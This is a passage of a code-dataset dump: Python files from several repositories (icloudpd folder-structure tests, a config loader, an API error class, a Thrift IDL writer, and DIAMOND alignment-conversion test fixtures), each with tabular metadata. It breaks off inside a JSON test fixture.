| 13.7 | 35 | 0.708029 | 17 | 137 | 5.411765 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008696 | 0.160584 | 137 | 9 | 36 | 15.222222 | 0.791304 | 0.306569 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f63e254de6e27c78b3902a5fa4d08a9fd86b76ac | 5,119 | py | Python | tests/test_folder_structure.py | mkirkland4874/icloud_photos_downloader | 04f356dc6fda18a4b56e45160eb7d18850f6a4e8 | [
"MIT"
] | 1,514 | 2020-10-22T13:41:41.000Z | 2022-03-31T23:19:49.000Z | tests/test_folder_structure.py | mkirkland4874/icloud_photos_downloader | 04f356dc6fda18a4b56e45160eb7d18850f6a4e8 | [
"MIT"
] | 200 | 2020-10-21T17:10:12.000Z | 2022-03-31T14:44:48.000Z | tests/test_folder_structure.py | mkirkland4874/icloud_photos_downloader | 04f356dc6fda18a4b56e45160eb7d18850f6a4e8 | [
"MIT"
] | 147 | 2020-10-26T00:37:40.000Z | 2022-03-17T19:55:16.000Z | from unittest import TestCase
import os
from os.path import normpath
import shutil
from click.testing import CliRunner
from vcr import VCR

from icloudpd.base import main
from tests.helpers.print_result_exception import print_result_exception
import inspect

vcr = VCR(decode_compressed_response=True)


class FolderStructureTestCase(TestCase):

    # This is basically a copy of the listing_recent_photos test #
    def test_default_folder_structure(self):
        base_dir = os.path.normpath(f"tests/fixtures/Photos/{inspect.stack()[0][3]}")
        ### Tests if the default directory structure is constructed correctly ###
        if os.path.exists(base_dir):
            shutil.rmtree(base_dir)
        os.makedirs(base_dir)

        # Note - This test uses the same cassette as test_download_photos.py
        with vcr.use_cassette("tests/vcr_cassettes/listing_photos.yml"):
            # Pass fixed client ID via environment variable
            runner = CliRunner(env={
                "CLIENT_ID": "DE309E26-942E-11E8-92F5-14109FE0B321"
            })
            result = runner.invoke(
                main,
                [
                    "--username",
                    "jdoe@gmail.com",
                    "--password",
                    "password1",
                    "--recent",
                    "5",
                    "--only-print-filenames",
                    "--no-progress-bar",
                    "-d",
                    base_dir,
                ],
            )
            print_result_exception(result)

            filenames = result.output.splitlines()

            self.assertEqual(len(filenames), 8)
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("2018/07/31/IMG_7409.JPG")), filenames[0]
            )
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("2018/07/31/IMG_7409.MOV")), filenames[1]
            )
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("2018/07/30/IMG_7408.JPG")), filenames[2]
            )
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("2018/07/30/IMG_7408.MOV")), filenames[3]
            )
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("2018/07/30/IMG_7407.JPG")), filenames[4]
            )
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("2018/07/30/IMG_7407.MOV")), filenames[5]
            )
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("2018/07/30/IMG_7405.MOV")), filenames[6]
            )
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("2018/07/30/IMG_7404.MOV")), filenames[7]
            )

            assert result.exit_code == 0

    def test_folder_structure_none(self):
        base_dir = os.path.normpath(f"tests/fixtures/Photos/{inspect.stack()[0][3]}")
        if os.path.exists(base_dir):
            shutil.rmtree(base_dir)
        os.makedirs(base_dir)

        # Note - This test uses the same cassette as test_download_photos.py
        with vcr.use_cassette("tests/vcr_cassettes/listing_photos.yml"):
            # Pass fixed client ID via environment variable
            runner = CliRunner(env={
                "CLIENT_ID": "DE309E26-942E-11E8-92F5-14109FE0B321"
            })
            result = runner.invoke(
                main,
                [
                    "--username",
                    "jdoe@gmail.com",
                    "--password",
                    "password1",
                    "--recent",
                    "5",
                    "--only-print-filenames",
                    "--folder-structure=none",
                    "--no-progress-bar",
                    "-d",
                    base_dir,
                ],
            )
            print_result_exception(result)

            filenames = result.output.splitlines()

            self.assertEqual(len(filenames), 8)
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("IMG_7409.JPG")), filenames[0]
            )
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("IMG_7409.MOV")), filenames[1]
            )
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("IMG_7408.JPG")), filenames[2]
            )
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("IMG_7408.MOV")), filenames[3]
            )
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("IMG_7407.JPG")), filenames[4]
            )
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("IMG_7407.MOV")), filenames[5]
            )
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("IMG_7405.MOV")), filenames[6]
            )
            self.assertEqual(
                os.path.join(base_dir, os.path.normpath("IMG_7404.MOV")), filenames[7]
            )

            assert result.exit_code == 0
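The two layouts being asserted differ only in whether a date-derived subpath is inserted between the base directory and the filename; a sketch of that choice (the function name and signature are illustrative, not icloudpd's API):

```python
import posixpath
from datetime import date

def photo_path(base_dir, filename, created, folder_structure="{:%Y/%m/%d}"):
    # "none" flattens everything into base_dir; otherwise a date-derived
    # subfolder such as 2018/07/31 is inserted before the filename.
    if folder_structure == "none":
        return posixpath.join(base_dir, filename)
    return posixpath.join(base_dir, folder_structure.format(created), filename)

assert photo_path("photos", "IMG_7409.JPG", date(2018, 7, 31)) == \
    "photos/2018/07/31/IMG_7409.JPG"
assert photo_path("photos", "IMG_7409.JPG", date(2018, 7, 31), "none") == \
    "photos/IMG_7409.JPG"
```

`posixpath` is used here only to keep the example's expected strings platform-independent.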
| 38.201493 | 97 | 0.530768 | 557 | 5,119 | 4.745063 | 0.219031 | 0.083995 | 0.068104 | 0.088536 | 0.823307 | 0.823307 | 0.823307 | 0.823307 | 0.823307 | 0.823307 | 0 | 0.060917 | 0.352217 | 5,119 | 133 | 98 | 38.488722 | 0.736128 | 0.068763 | 0 | 0.568966 | 0 | 0 | 0.15671 | 0.102861 | 0 | 0 | 0 | 0 | 0.172414 | 1 | 0.017241 | false | 0.034483 | 0.077586 | 0 | 0.103448 | 0.043103 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f65fb8f94d2586b90611899957f8aa9e101e4168 | 160 | py | Python | config/__init__.py | microserv/Index-service | 9c4894f3802cf24950dfc952d24589d1bd107ae6 | [
"MIT"
] | null | null | null | config/__init__.py | microserv/Index-service | 9c4894f3802cf24950dfc952d24589d1bd107ae6 | [
"MIT"
] | null | null | null | config/__init__.py | microserv/Index-service | 9c4894f3802cf24950dfc952d24589d1bd107ae6 | [
"MIT"
] | null | null | null | from config.base import *  # flake8: noqa

try:
    from config.local import *  # flake8: noqa
except ImportError:
    print('Local settings file not found.')
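The try/except import above implements an optional-local-overrides pattern: base settings always load, and a local module replaces them only if it exists. A self-contained sketch of the same idea (the base-settings dict and module name are illustrative):

```python
import importlib

def load_settings(local_module='config.local'):
    settings = {'DEBUG': False, 'HOST': 'example.com'}  # stands in for config.base
    try:
        local = importlib.import_module(local_module)
        # Only upper-case names are treated as settings, mirroring the usual convention.
        settings.update({k: v for k, v in vars(local).items() if k.isupper()})
    except ImportError:
        print('Local settings file not found.')
    return settings

settings = load_settings()  # no config.local here, so base values win
assert settings['DEBUG'] is False
```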
| 20 | 46 | 0.69375 | 21 | 160 | 5.285714 | 0.714286 | 0.18018 | 0.288288 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015873 | 0.2125 | 160 | 7 | 47 | 22.857143 | 0.865079 | 0.15625 | 0 | 0 | 0 | 0 | 0.229008 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0.2 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f671805cc46df49e12ec3a2604556c32f863a537 | 246 | py | Python | end_to_end_tests/golden-master/my_test_api_client/errors.py | Maistho/openapi-python-client | e123b966e8d31db173e09cabc8284a855d07e425 | [
"MIT"
] | null | null | null | end_to_end_tests/golden-master/my_test_api_client/errors.py | Maistho/openapi-python-client | e123b966e8d31db173e09cabc8284a855d07e425 | [
"MIT"
] | null | null | null | end_to_end_tests/golden-master/my_test_api_client/errors.py | Maistho/openapi-python-client | e123b966e8d31db173e09cabc8284a855d07e425 | [
"MIT"
] | null | null | null | from httpx import Response
class ApiResponseError(Exception):
    """ An exception raised when an unknown response occurs """

    def __init__(self, *, response: Response):
        super().__init__()
        self.response: Response = response
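The bare `*` in the signature makes `response` keyword-only, so callers must name the argument. A stand-alone sketch with a stub in place of `httpx.Response` (both classes here are illustrative re-implementations, not the generated client):

```python
class StubResponse:
    """Minimal stand-in for httpx.Response, for illustration only."""
    def __init__(self, status_code):
        self.status_code = status_code


class ApiResponseError(Exception):
    def __init__(self, *, response):
        super().__init__()
        self.response = response


err = ApiResponseError(response=StubResponse(500))
assert err.response.status_code == 500

raised = False
try:
    ApiResponseError(StubResponse(500))  # positional argument is rejected
except TypeError:
    raised = True
assert raised
```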
| 24.6 | 63 | 0.686992 | 26 | 246 | 6.192308 | 0.615385 | 0.298137 | 0.198758 | 0.298137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215447 | 246 | 9 | 64 | 27.333333 | 0.834197 | 0.207317 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
9caec5c328e068059387a1b4d5dc9e459d6c4b0c | 67 | py | Python | tests/test_main.py | arisp99/sphinx-toolbox | 2987080e2d65c0dd2d392dcf7f1f5a904a9231f5 | [
"MIT"
] | 30 | 2021-03-01T00:15:55.000Z | 2022-03-01T13:23:59.000Z | tests/test_main.py | arisp99/sphinx-toolbox | 2987080e2d65c0dd2d392dcf7f1f5a904a9231f5 | [
"MIT"
] | 56 | 2020-12-17T12:39:04.000Z | 2022-03-21T19:00:55.000Z | tests/test_main.py | arisp99/sphinx-toolbox | 2987080e2d65c0dd2d392dcf7f1f5a904a9231f5 | [
"MIT"
] | 4 | 2021-07-04T16:57:52.000Z | 2022-03-21T19:35:31.000Z | def test_import():
    # this package
    import sphinx_toolbox.__main__
| 16.75 | 31 | 0.791045 | 9 | 67 | 5.222222 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134328 | 67 | 3 | 32 | 22.333333 | 0.810345 | 0.179104 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 1 | 0 | 1.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9cb4598d5b2c951d1f11546a977a1b1905f3b892 | 9,996 | py | Python | satori.ars/satori/ars/thrift/writer.py | Cloud11665/satori-git | ea1855a920c98b480423bf247bce6e5626985c4a | [
"MIT"
] | 4 | 2021-01-05T01:35:36.000Z | 2021-12-13T00:05:14.000Z | satori.ars/satori/ars/thrift/writer.py | Cloud11665/satori-git | ea1855a920c98b480423bf247bce6e5626985c4a | [
"MIT"
] | 2 | 2020-06-06T01:12:07.000Z | 2020-06-06T01:16:01.000Z | satori.ars/satori/ars/thrift/writer.py | Cloud11665/satori-git | ea1855a920c98b480423bf247bce6e5626985c4a | [
"MIT"
] | 2 | 2021-01-05T01:33:30.000Z | 2021-03-06T13:48:21.000Z | # vim:ts=4:sts=4:sw=4:expandtab
"""IDL writer for the Thrift protocol.
"""
from satori.ars.model import *
class ThriftWriter(object):
    """An ARS writer spitting out thrift IDL.
    """

    ATOMIC_NAMES = {
        ArsBinary: 'binary',
        ArsBoolean: 'bool',
        ArsInt8: 'byte',
        ArsInt16: 'i16',
        ArsInt32: 'i32',
        ArsInt64: 'i64',
        ArsFloat: 'double',
        ArsString: 'string',
        ArsVoid: 'void',
    }

    def _reference(self, item, target):
        if isinstance(item, ArsAtomicType):
            target.write(ThriftWriter.ATOMIC_NAMES[item])
        elif isinstance(item, ArsList):
            target.write('list<')
            self._reference(item.element_type, target)
            target.write('>')
        elif isinstance(item, ArsMap):
            target.write('map<')
            self._reference(item.key_type, target)
            target.write(',')
            self._reference(item.value_type, target)
            target.write('>')
        elif isinstance(item, ArsSet):
            target.write('set<')
            self._reference(item.element_type, target)
            target.write('>')
        elif isinstance(item, ArsNamedElement):
            target.write(item.name)
        else:
            raise RuntimeError("Unhandled Element type '{0}'".format(item.__class__.__name__))

    # @DispatchOn(item=ArsElement)
    # def _reference(self, item, target): # pylint: disable-msg=E0102
    #     raise RuntimeError("Unhandled Element type '{0}'".format(item.__class__.__name__))
    #
    # @DispatchOn(item=ArsNamedElement)
    # def _reference(self, item, target): # pylint: disable-msg=E0102
    #     target.write(item.name)
    #
    # @DispatchOn(item=ArsAtomicType)
    # def _reference(self, item, target): # pylint: disable-msg=E0102
    #     target.write(ThriftWriter.ATOMIC_NAMES[item])
    #
    # @DispatchOn(item=ArsList)
    # def _reference(self, item, target): # pylint: disable-msg=E0102
    #     target.write('list<')
    #     self._reference(item.element_type, target)
    #     target.write('>')
    #
    # @DispatchOn(item=ArsMap)
    # def _reference(self, item, target): # pylint: disable-msg=E0102
    #     target.write('map<')
    #     self._reference(item.key_type, target)
    #     target.write(',')
    #     self._reference(item.value_type, target)
    #     target.write('>')
    #
    # @DispatchOn(item=ArsSet)
    # def _reference(self, item, target): # pylint: disable-msg=E0102
    #     target.write('set<')
    #     self._reference(item.element_type, target)
    #     target.write('>')

    def _write(self, item, target):
        if isinstance(item, ArsTypeAlias):
            target.write('typedef ')
            self._reference(item.target_type, target)
            target.write(' ')
            self._reference(item, target)
            target.write('\n')
        elif isinstance(item, ArsException):
            target.write('exception ')
            self._reference(item, target)
            target.write(' {')
            sep = '\n\t'
            ind = 1
            for field in item.fields:
                target.write('{0}{1}:'.format(sep, ind))
                if field.optional:
                    target.write('optional ')
                self._reference(field.type, target)
                target.write(' ')
                self._reference(field, target)
                sep = '\n\t'
                ind += 1
            target.write('\n}\n')
        elif isinstance(item, ArsStructure):
            target.write('struct ')
            self._reference(item, target)
            target.write(' {')
            sep = '\n\t'
            ind = 1
            for field in item.fields:
                target.write('{0}{1}:'.format(sep, ind))
                if field.optional:
                    target.write('optional ')
                self._reference(field.type, target)
                target.write(' ')
                self._reference(field, target)
                sep = '\n\t'
                ind += 1
            target.write('\n}\n')
        elif isinstance(item, ArsConstant):
            if item.type == ArsInteger:
                target.write('const ')
                self._reference(item.type, target)
                target.write(' ')
                self._reference(item, target)
                target.write(' ' + str(item.value))
            else:
                raise ValueError('Constant type is not supported: {0}'.format(item.type))
        elif isinstance(item, ArsService):
            target.write('service ')
            self._reference(item, target)
            if item.base:
                target.write(' extends ')
                self._reference(item.base, target)
            target.write(' {')
            sep = '\n\t'
            for procedure in item.procedures:
                target.write(sep)
                self._reference(procedure.return_type, target)
                target.write(' ')
                self._reference(procedure, target)
                target.write('(')
                sep2 = ''
                ind = 1
                for parameter in procedure.parameters:
                    target.write('{0}{1}:'.format(sep2, ind))
                    if parameter.optional:
                        target.write('optional ')
                    self._reference(parameter.type, target)
                    target.write(' ')
                    self._reference(parameter, target)
                    sep2 = ', '
                    ind += 1
                target.write(')')
                if procedure.exception_types:
                    target.write(' throws (')
                    sep2 = ''
                    ind = 1
                    for exception_type in procedure.exception_types:
                        target.write('{0}{1}:'.format(sep2, ind))
                        self._reference(exception_type, target)
                        target.write(' error{0}'.format(ind))
                        sep2 = ', '
                        ind += 1
                    target.write(')')
                sep = '\n\t'
            target.write('\n}\n')

    # @DispatchOn(item=ArsTypeAlias)
    # def _write(self, item, target): # pylint: disable-msg=E0102
    #     target.write('typedef ')
    #     self._reference(item.target_type, target)
    #     target.write(' ')
    #     self._reference(item, target)
    #     target.write('\n')
    #
    # @DispatchOn(item=ArsStructure)
    # def _write(self, item, target): # pylint: disable-msg=E0102
    #     target.write('struct ')
    #     self._reference(item, target)
    #     target.write(' {')
    #     sep = '\n\t'
    #     ind = 1
    #     for field in item.fields:
    #         target.write('{0}{1}:'.format(sep, ind))
    #         if field.optional:
    #             target.write('optional ')
    #         self._reference(field.type, target)
    #         target.write(' ')
    #         self._reference(field, target)
    #         sep = '\n\t'
    #         ind += 1
    #     target.write('\n}\n')
    #
    # @DispatchOn(item=ArsException)
    # def _write(self, item, target): # pylint: disable-msg=E0102
    #     target.write('exception ')
    #     self._reference(item, target)
    #     target.write(' {')
    #     sep = '\n\t'
    #     ind = 1
    #     for field in item.fields:
    #         target.write('{0}{1}:'.format(sep, ind))
    #         if field.optional:
    #             target.write('optional ')
    #         self._reference(field.type, target)
    #         target.write(' ')
    #         self._reference(field, target)
    #         sep = '\n\t'
    #         ind += 1
    #     target.write('\n}\n')
    #
    # @DispatchOn(item=ArsConstant)
    # def _write(self, item, target): # pylint: disable-msg=E0102
    #     if item.type == ArsInteger:
    #         target.write('const ')
    #         self._reference(item.type, target)
    #         target.write(' ')
    #         self._reference(item, target)
    #         target.write(' ' + str(item.value))
    #     else:
    #         raise ValueError('Constant type is not supported: {0}'.format(item.type))
    #
    # @DispatchOn(item=ArsService)
    # def _write(self, item, target): # pylint: disable-msg=E0102
    #     target.write('service ')
    #     self._reference(item, target)
    #     if item.base:
    #         target.write(' extends ')
    #         self._reference(item.base, target)
    #     target.write(' {')
    #     sep = '\n\t'
    #     for procedure in item.procedures:
    #         target.write(sep)
    #         self._reference(procedure.return_type, target)
    #         target.write(' ')
    #         self._reference(procedure, target)
    #         target.write('(')
    #         sep2 = ''
    #         ind = 1
    #         for parameter in procedure.parameters:
    #             target.write('{0}{1}:'.format(sep2, ind))
    #             if parameter.optional:
    #                 target.write('optional ')
    #             self._reference(parameter.type, target)
    #             target.write(' ')
    #             self._reference(parameter, target)
    #             sep2 = ', '
    #             ind += 1
    #         target.write(')')
    #         if procedure.exception_types:
    #             target.write(' throws (')
    #             sep2 = ''
    #             ind = 1
    #             for exception_type in procedure.exception_types:
    #                 target.write('{0}{1}:'.format(sep2, ind))
    #                 self._reference(exception_type, target)
    #                 target.write(' error{0}'.format(ind))
    #                 sep2 = ', '
    #                 ind += 1
    #             target.write(')')
    #         sep = '\n\t'
    #     target.write('\n}\n')
    #

    def write_to(self, interface, target):
        target.write('namespace java satori.thrift.gen\n')
        for type in interface.types:
            self._write(type, target)
        for constant in interface.constants:
            self._write(constant, target)
        for service in interface.services:
            self._write(service, target)
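The type-rendering recursion in `_reference` can be exercised without the satori model classes; a stand-alone sketch with stand-in type classes (all names here are mine, not the ARS model):

```python
class Atomic:
    def __init__(self, name):
        self.name = name

class List_:
    def __init__(self, element_type):
        self.element_type = element_type

class Map_:
    def __init__(self, key_type, value_type):
        self.key_type = key_type
        self.value_type = value_type

def reference(item):
    # Mirror ThriftWriter._reference: atoms render by name, containers recurse.
    if isinstance(item, Atomic):
        return item.name
    if isinstance(item, List_):
        return 'list<' + reference(item.element_type) + '>'
    if isinstance(item, Map_):
        return 'map<' + reference(item.key_type) + ',' + reference(item.value_type) + '>'
    raise RuntimeError('Unhandled type')

assert reference(Map_(Atomic('string'), List_(Atomic('i32')))) == 'map<string,list<i32>>'
```

The real class writes into a stream instead of returning a string, but the dispatch-and-recurse shape is the same.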
| 36.481752 | 94 | 0.508203 | 967 | 9,996 | 5.152017 | 0.125129 | 0.187676 | 0.11943 | 0.092734 | 0.833802 | 0.829787 | 0.796267 | 0.792654 | 0.792654 | 0.774589 | 0 | 0.017046 | 0.354442 | 9,996 | 273 | 95 | 36.615385 | 0.754998 | 0.459584 | 0 | 0.457364 | 0 | 0 | 0.063797 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023256 | false | 0 | 0.007752 | 0 | 0.046512 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
142c7005ae0738dfec0f7becf1e4fac2e085a686 | 45 | py | Python | python/stromx/test/__init__.py | roteroktober/stromx | e081a35114f68a77e99a4761946b8b8c64eb591a | [
"Apache-2.0"
] | null | null | null | python/stromx/test/__init__.py | roteroktober/stromx | e081a35114f68a77e99a4761946b8b8c64eb591a | [
"Apache-2.0"
] | null | null | null | python/stromx/test/__init__.py | roteroktober/stromx | e081a35114f68a77e99a4761946b8b8c64eb591a | [
"Apache-2.0"
] | null | null | null | import stromx.runtime
from libtest import *
| 11.25 | 21 | 0.8 | 6 | 45 | 6 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155556 | 45 | 3 | 22 | 15 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
14425478ce240adb8af1278d60e42571d6b62664 | 58,233 | py | Python | test/diamond/test_conversion.py | TaliVeith/dark-matter | 1548a6e6fbfceb7c8b13556bbf4f7ce7d1ac18a0 | [
"MIT"
] | 10 | 2016-03-09T09:43:14.000Z | 2021-04-03T21:46:12.000Z | test/diamond/test_conversion.py | terrycojones/dark-matter | 67d16f870db6b4239e17e542bc6e3f072dc29c75 | [
"MIT"
] | 332 | 2015-01-07T12:37:30.000Z | 2022-01-20T15:48:11.000Z | test/diamond/test_conversion.py | terrycojones/dark-matter | 67d16f870db6b4239e17e542bc6e3f072dc29c75 | [
"MIT"
] | 4 | 2016-03-08T14:56:39.000Z | 2021-01-27T08:11:27.000Z | from six.moves import builtins
from unittest import TestCase
from io import BytesIO
import bz2file
from bz2 import compress
from six import assertRaisesRegex, StringIO
try:
    from unittest.mock import patch, mock_open
except ImportError:
    from mock import patch
from json import dumps
from dark.diamond.conversion import (
    JSONRecordsReader, DiamondTabularFormatReader, DiamondTabularFormat)
from dark.reads import Reads, AARead
# The 15 fields expected in the DIAMOND output we parse are:
#
# qtitle, stitle, bitscore, evalue, qframe, qseq, qstart, qend, sseq, sstart,
# send, slen, btop, nident, positive
#
# See the --outfmt section of 'diamond help' for detail on these directives.
#
# Note that the fields below must be separated by TABs.
DIAMOND_RECORDS = """\
ACC94 INSV 29.6 0.003 1 EFII 178 295 SSSEV 175 285 295 4 0 1
ACC94 CASV 28.1 0.008 1 KLL 7 37 ITRV 9 39 300 3 1 2
ACC94 Golden 28.1 0.009 1 IKSKL 7 35 EETSR 9 37 293 5 2 3
ACC94 Golden 23.5 0.21 1 TIMSVV 177 240 DDMV 179 235 293 6 3 4
ACC94 HCoV 25.0 0.084 1 LHVNYL 1 203 DEELKA 2 210 290 6 4 5
ACC94 HCoV 18.5 9.1 1 SEIICE 226 257 VETVAQ 20 45 290 9 5 6
ACC94 FERV 24.6 0.11 1 YSCFT 176 276 LGKRMFC 152 243 270 10 6 7
AKAV AKAV 634 0.0 1 GEPFSV 1 306 NIYGEP 1 306 306 8 7 8
AKAV WYOV 401 7e-143 1 PFSVYG 1 306 GEPMS 1 294 294 8 8 9
BHAV TAIV 28.1 0.008 1 PKELHG 14 118 SLKSKE 15 131 307 8 9 10
BHAV SBAY 28.1 0.009 1 CRPTF 4 293 EFVFIY 6 342 343 5 10 11
"""
# The 13 fields expected in the DIAMOND output before we added identities
# and positives (in version 2.0.3) were:
#
# qtitle, stitle, bitscore, evalue, qframe, qseq, qstart, qend, sseq, sstart,
# send, slen, btop
#
# See the --outfmt section of 'diamond help' for detail on these directives.
#
# Note that the fields below must be separated by TABs.
DIAMOND_RECORDS_WITHOUT_NIDENT_AND_POSITIVE = """\
ACC94 INSV 29.6 0.003 1 EFII 178 295 SSSEV 175 285 295 4
ACC94 CASV 28.1 0.008 1 KLL 7 37 ITRV 9 39 300 3
ACC94 Golden 28.1 0.009 1 IKSKL 7 35 EETSR 9 37 293 5
ACC94 Golden 23.5 0.21 1 TIMSVV 177 240 DDMV 179 235 293 6
ACC94 HCoV 25.0 0.084 1 LHVNYL 1 203 DEELKA 2 210 290 6
ACC94 HCoV 18.5 9.1 1 SEIICE 226 257 VETVAQ 20 45 290 9
ACC94 FERV 24.6 0.11 1 YSCFT 176 276 LGKRMFC 152 243 270 10
AKAV AKAV 634 0.0 1 GEPFSV 1 306 NIYGEP 1 306 306 8
AKAV WYOV 401 7e-143 1 PFSVYG 1 306 GEPMS 1 294 294 8
BHAV TAIV 28.1 0.008 1 PKELHG 14 118 SLKSKE 15 131 307 8
BHAV SBAY 28.1 0.009 1 CRPTF 4 293 EFVFIY 6 342 343 5
"""
# The 17 fields expected in the DIAMOND output with nident, pident (number
# and percent identical) and positive & ppos (number and percent positive).
#
# qtitle, stitle, bitscore, evalue, qframe, qseq, qstart, qend, sseq, sstart,
# send, slen, btop, nident, pident, positive, ppos
#
# See the --outfmt section of 'diamond help' for detail on these directives.
#
# Note that the fields below must be separated by TABs.
DIAMOND_RECORDS_WITH_PERCENTS = """\
ACC94 INSV 29.6 0.003 1 EFII 178 295 SSSEV 175 285 295 4 2 5.0 1 4.0
ACC94 CASV 28.1 0.008 1 KLL 7 37 ITRV 9 39 300 3 3 10.0 2 9.0
ACC94 Golden 28.1 0.009 1 IKSKL 7 35 EETSR 9 37 293 5 4 15.0 3 14.0
ACC94 Golden 23.5 0.21 1 TIMSVV 177 240 DDMV 179 235 293 6 5 20.0 4 19.0
ACC94 HCoV 25.0 0.084 1 LHVNYL 1 203 DEELKA 2 210 290 6 6 25.0 5 24.0
ACC94 HCoV 18.5 9.1 1 SEIICE 226 257 VETVAQ 20 45 290 9 7 30.0 6 29.0
ACC94 FERV 24.6 0.11 1 YSCFT 176 276 LGKRMFC 152 243 270 10 8 35.0 7 34.0
AKAV AKAV 634 0.0 1 GEPFSV 1 306 NIYGEP 1 306 306 8 9 40.0 8 39.0
AKAV WYOV 401 7e-143 1 PFSVYG 1 306 GEPMS 1 294 294 8 10 45.0 9 44.0
BHAV TAIV 28.1 0.008 1 PKELHG 14 118 SLKSKE 15 131 307 8 11 50.0 10 49.0
BHAV SBAY 28.1 0.009 1 CRPTF 4 293 EFVFIY 6 342 343 5 12 55.0 11 54.0
"""
DIAMOND_RECORD_WITH_SPACES_IN_TITLES = """\
ACC 94 IN SV 29.6 0.003 1 EFII 178 295 SSSEV 175 285 295 4
"""
DIAMOND_RECORDS_DUMPED = '\n'.join([
    dumps({
        "application": "DIAMOND",
        "reference": ("Buchfink et al., Fast and Sensitive "
                      "Protein Alignment using DIAMOND, Nature Methods, "
                      "12, 59-60 (2015)"),
        "task": "blastx",
        "version": "v0.8.23"
    }, sort_keys=True),
    dumps({
        "alignments": [
            {
                "hsps": [
                    {
                        "bits": 29.6,
                        "btop": "4",
                        "expect": 0.003,
                        "frame": 1,
                        "identicalCount": 0,
                        "percentIdentical": None,
                        "positiveCount": 1,
                        "percentPositive": None,
                        "query": "EFII",
                        "query_end": 295,
                        "query_start": 178,
                        "sbjct": "SSSEV",
                        "sbjct_end": 285,
                        "sbjct_start": 175
                    }
                ],
                "length": 295,
                "title": "INSV"
            },
            {
                "hsps": [
                    {
                        "bits": 28.1,
                        "btop": "3",
                        "expect": 0.008,
                        "frame": 1,
                        "identicalCount": 1,
                        "percentIdentical": None,
                        "positiveCount": 2,
                        "percentPositive": None,
                        "query": "KLL",
                        "query_end": 37,
                        "query_start": 7,
                        "sbjct": "ITRV",
                        "sbjct_end": 39,
                        "sbjct_start": 9
                    }
                ],
                "length": 300,
                "title": "CASV"
            },
            {
                "hsps": [
                    {
                        "bits": 28.1,
                        "btop": "5",
                        "expect": 0.009,
                        "frame": 1,
                        "identicalCount": 2,
                        "percentIdentical": None,
                        "positiveCount": 3,
                        "percentPositive": None,
                        "query": "IKSKL",
                        "query_end": 35,
                        "query_start": 7,
                        "sbjct": "EETSR",
                        "sbjct_end": 37,
